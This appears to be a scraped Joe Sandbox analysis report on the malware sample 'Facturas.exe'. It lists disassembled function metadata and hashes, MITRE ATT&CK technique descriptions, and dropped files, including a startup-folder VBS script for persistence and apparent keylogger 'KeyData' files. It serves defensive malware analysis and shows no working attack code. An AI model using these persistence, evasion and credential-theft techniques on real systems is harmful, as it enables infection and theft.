Function 00412B15 Relevance: 5.2, Strings: 4, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 00412E4E
D, xrefs: 00412F11
XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw, xrefs: 00412B74, 00412E80
38AF112504A7220A7B6852AC982D071529E87A, xrefs: 00412B49, 00412E55

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000412000.00000040.00000400.00020000.00000000.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_412000_InstallUtil.jbxd

Similarity

API ID:
String ID: 38AF112504A7220A7B6852AC982D071529E87A$?$D$XTItWtjYUDGYsYkgxrxvyOXRSallpdhEiXsycThMNApw
API String ID: 0-4122831561
Opcode ID: 26267e868d027971ab7c3965296eddafa4c44cf50a1ef5ec62918c93dae2912c
Instruction ID: 00962eedb1b21dab3f4e506477a4291b7f69925dc91d9a362de2bcb9db628029
Opcode Fuzzy Hash: 26267e868d027971ab7c3965296eddafa4c44cf50a1ef5ec62918c93dae2912c
Instruction Fuzzy Hash: B6C1E674900219CBDB64DF20DD98BEAB775FB49300F1086EAE509B7260DB745AC9CF58

Function 004239F0 Relevance: 4.1, Strings: 3, Instructions: 369
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nwyUwdpsqLJClaajGiYtdVF, xrefs: 00423B0E, 00423EE3
x @, xrefs: 00423A19
02C4F964F67CDFC79E768A9A, xrefs: 00423AEC, 00423EC1

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_423000_InstallUtil.jbxd

Similarity

API ID:
String ID: 02C4F964F67CDFC79E768A9A$nwyUwdpsqLJClaajGiYtdVF$x @
API String ID: 0-587647067
Opcode ID: d493c51eb299503b55afd25ecbb89eb727b30de1831bd9e141a4ef9590969680
Instruction ID: 7fa57fc0dc2508efa019771b7002e7e3f85128aabfe052c040795d02a5cb1123
Opcode Fuzzy Hash: d493c51eb299503b55afd25ecbb89eb727b30de1831bd9e141a4ef9590969680
Instruction Fuzzy Hash: 81020A74900219CFDB14DFA4DA88BDEBBB5FB48305F1081AAE50AB7260DB745E85CF58

Function 00423AB6 Relevance: 2.8, Strings: 2, Instructions: 313
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

nwyUwdpsqLJClaajGiYtdVF, xrefs: 00423B0E, 00423EE3
02C4F964F67CDFC79E768A9A, xrefs: 00423AEC, 00423EC1

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000423000.00000040.00000400.00020000.00000000.sdmp, Offset: 00423000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_423000_InstallUtil.jbxd

Similarity

API ID:
String ID: 02C4F964F67CDFC79E768A9A$nwyUwdpsqLJClaajGiYtdVF
API String ID: 0-2267373698
Opcode ID: 960152430a3f7dfd14ecdfa7b1118175cac60a97476ca2770d03d4d7baf94ed9
Instruction ID: 6c389b97176e3affc816539a619eb94fcad1fc1623cf6e691c8588653aad753d
Opcode Fuzzy Hash: 960152430a3f7dfd14ecdfa7b1118175cac60a97476ca2770d03d4d7baf94ed9
Instruction Fuzzy Hash: 93E10A75A00219CFDB14DF94D988BDEB7B5FB48304F2081AAE40ABB254DB749E85CF58

Function 0040380C Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd57b730f24c4dd4d32c960e92daa4bb71a31e917e155c265487dcf7dd5ca0a
Instruction ID: ef76f5f9b3331fca57233c4601a9772f411f27566c258654c613623be55f68c6
Opcode Fuzzy Hash: 7cd57b730f24c4dd4d32c960e92daa4bb71a31e917e155c265487dcf7dd5ca0a
Instruction Fuzzy Hash: 76411FA640E7C14FD3138B749C622827FB09E0321972E45EBC0C1CE1E3D26E490AC76B

Function 00404E7C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2479512482.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ad705bd5a42479787326bdaae90a48c344dcb36e92292d206dd17f175f5d2e9
Instruction ID: 77c4cdd5adefd1227871ba1f259dbba8083402c38d69616c3fd89bcd609e109d
Opcode Fuzzy Hash: 3ad705bd5a42479787326bdaae90a48c344dcb36e92292d206dd17f175f5d2e9
Instruction Fuzzy Hash: 22B012603A4141EAEA009BB4CC426241184B3C0B80B304C33EA01E21D0CB38CE20C37D

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Facturas.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Id.exe

C:\Users\user\AppData\Roaming\Id.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataAgrYXqvU.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataBXpKTjRE.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataEHCgjwEU.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataGBsLLrRN.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataJIKawXjD.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataJaavKlQS.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataMwoscjvf.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataOkwBKOVT.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQduyKGov.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQeSjVzIZ.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQusNBrHR.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataSJubBUuq.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataSojrcmUK.txt

Windows Analysis Report
Facturas.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre